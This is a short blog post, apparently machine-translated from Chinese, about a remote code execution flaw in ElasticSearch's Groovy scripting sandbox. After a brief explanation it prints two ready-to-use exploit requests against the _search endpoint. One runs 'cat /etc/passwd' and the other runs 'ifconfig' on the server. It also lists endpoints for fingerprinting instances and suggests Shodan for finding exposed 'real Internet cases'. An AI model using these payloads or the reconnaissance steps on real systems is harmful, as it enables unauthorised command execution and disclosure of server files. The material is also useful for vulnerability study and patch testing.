Rookie

漫游指南-1 的世界

流浪在大理的斜杠青年
首页标签归档图文关于

ElasticSearch Groovy Remote Code Execution Vulnerability

#漏洞复现#ElasticSearch92
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document discusses a remote code execution vulnerability in ElasticSearch, specifically related to its use of Groovy for scripting. Originally, ElasticSearch used MVEL for scripting, which allowed attackers to execute arbitrary Java code. Although Groovy was later adopted with a sandbox to restrict dangerous code, the sandbox's limitations led to vulnerabilities. The document provides a proof of concept (POC) for exploiting this vulnerability using a specific POST request to execute commands on the server. Additionally, it mentions how to gather information about ElasticSearch instances using various endpoints.

Recently discovered in the company's internal network while using ElasticSearch, so I looked into it.

Vulnerability Principle

ElasticSearch is a search and analytics engine developed in JAVA.

In 2014, a remote code execution vulnerability (CVE-2014-3120) was exposed, which occurred in the script query module. Since the search engine supports using script code (MVEL) for data manipulation, attackers can construct and execute arbitrary Java code through MVEL.

Later, the scripting language engine was changed to Groovy, and a sandbox was introduced for control. Dangerous code would be intercepted; however, due to the lax restrictions of the sandbox, remote code execution was still possible.

Vulnerability POC

The principle has been analyzed by many people, so I won't repeat it here. Let's get straight to the POC that everyone is looking forward to!

POST http://target:9200/_search?pretty 
{"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}

Real Internet Cases

The ElasticSearch port is an important fingerprint of the engine. If you use Shodan to search, it’s also quite good.

Check status: http://xxxx:9200/_status
Cluster health report: http://xxxx:9200/_cluster/health
Cluster node information: http://xxxx:9200/_nodes

http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io.*;\nString%20str%20=%20\%22\%22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\%22ifconfig\%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();%22}}}
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.